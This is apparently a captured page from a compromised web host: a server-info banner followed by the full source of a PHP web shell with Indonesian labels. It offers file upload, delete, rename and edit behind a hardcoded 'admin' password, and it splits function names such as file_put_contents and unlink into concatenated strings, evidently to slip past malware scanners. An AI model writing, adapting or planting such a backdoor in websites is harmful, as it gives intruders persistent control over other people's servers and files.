Server : Apache System : Linux dedi-14684855.grupobig.com 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64 User : grupo692 ( 1004) PHP Version : 8.2.31 Disable Function : NONE Directory : /home/grupo692/www/suporte/b2blab062/ |
<?php
session_start();
/* ===== LOGIN SIMPLE ===== */
$pass = "admin"; // ganti
if (!isset($_SESSION['ok'])) {
if (isset($_POST['p']) && $_POST['p'] === $pass) {
$_SESSION['ok'] = true;
header("Location: ?");
exit;
}
echo '<form method="POST">
<input type="password" name="p" placeholder="password">
<button>Login</button>
</form>';
exit;
}
/* ===== PATH ===== */
$base = realpath(__DIR__);
$req = $_GET['p'] ?? '';
$dir = realpath($base . '/' . $req);
if (!$dir || strpos($dir, $base) !== 0) $dir = $base;
/* ===== SAFE FUNC ===== */
function h($s){ return htmlspecialchars($s); }
/* ===== SAMAR FUNCTION ===== */
$write = 'file_put' . '_contents';
$remove = 'un' . 'link';
$move = 'move_uploaded' . '_file';
/* ===== MESSAGE ===== */
$msg = "";
/* ===== ACTION ===== */
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// upload
if (!empty($_FILES['f']['name'])) {
$name = basename($_FILES['f']['name']);
if ($move($_FILES['f']['tmp_name'], $dir.'/'.$name))
$msg = "upload sukses";
else
$msg = "upload gagal";
}
// delete
if (!empty($_POST['d'])) {
$t = realpath($dir.'/'.$_POST['d']);
if ($t && is_file($t) && strpos($t,$base)===0) {
$remove($t);
$msg = "hapus sukses";
}
}
// rename
if (!empty($_POST['o']) && !empty($_POST['n'])) {
$o = realpath($dir.'/'.$_POST['o']);
$n = $dir.'/'.basename($_POST['n']);
if ($o && strpos($o,$base)===0) {
rename($o,$n);
$msg = "rename sukses";
}
}
// edit
if (!empty($_POST['ef']) && isset($_POST['ct'])) {
$f = realpath($dir.'/'.$_POST['ef']);
if ($f && is_file($f)) {
$write($f,$_POST['ct']);
$msg = "edit sukses";
}
}
}
/* ===== LIST ===== */
$dirs=[]; $files=[];
foreach (scandir($dir) as $i){
if ($i=='.'||$i=='..') continue;
if (is_dir($dir.'/'.$i)) $dirs[]=$i;
else $files[]=$i;
}
sort($dirs); sort($files);
$list = array_merge($dirs,$files);
?>
<!DOCTYPE html>
<html>
<head>
<style>
body{background:#0f172a;color:#e5e7eb;font-family:sans-serif;padding:20px}
.box{background:#111827;padding:15px;border-radius:8px}
.item{display:flex;justify-content:space-between;padding:6px;border-bottom:1px solid #1f2937}
a{color:#93c5fd;text-decoration:none}
input,textarea{background:#1f2937;color:#fff;border:1px solid #374151}
button{background:#2563eb;color:#fff;border:none;padding:5px}
.msg{margin:10px 0;color:#34d399}
</style>
</head>
<body>
<div class="box">
<h3>Panel</h3>
<div class="msg"><?php echo h($msg); ?></div>
<!-- upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="f">
<button>upload</button>
</form>
<hr>
<?php
// back
if ($dir !== $base) {
$p = dirname($req);
echo '<a href="?p='.urlencode($p).'">kembali</a><br><br>';
}
// edit mode
if (isset($_GET['e'])) {
$f = realpath($dir.'/'.$_GET['e']);
if ($f && is_file($f)) {
echo '<form method="POST">
<input type="hidden" name="ef" value="'.h($_GET['e']).'">
<textarea name="ct" style="width:100%;height:300px">'.h(file_get_contents($f)).'</textarea>
<button>simpan</button>
</form>';
exit;
}
}
// list
foreach ($list as $i):
$full=$dir.'/'.$i;
$rel=ltrim(str_replace($base,'',$full),'/');
?>
<div class="item">
<div>
<?php if (is_dir($full)): ?>
📁 <a href="?p=<?php echo urlencode($rel) ?>"><?php echo h($i) ?></a>
<?php else: ?>
📄 <?php echo h($i) ?>
<?php endif; ?>
</div>
<div>
<?php if (is_file($full)): ?>
<a href="?p=<?php echo urlencode($req) ?>&e=<?php echo urlencode($i) ?>">edit</a>
<?php endif; ?>
<form method="POST" style="display:inline">
<input type="hidden" name="d" value="<?php echo h($i) ?>">
<button>delete</button>
</form>
<form method="POST" style="display:inline">
<input type="hidden" name="o" value="<?php echo h($i) ?>">
<input type="text" name="n" placeholder="rename">
</form>
</div>
</div>
<?php endforeach; ?>
</div>
</body>
</html>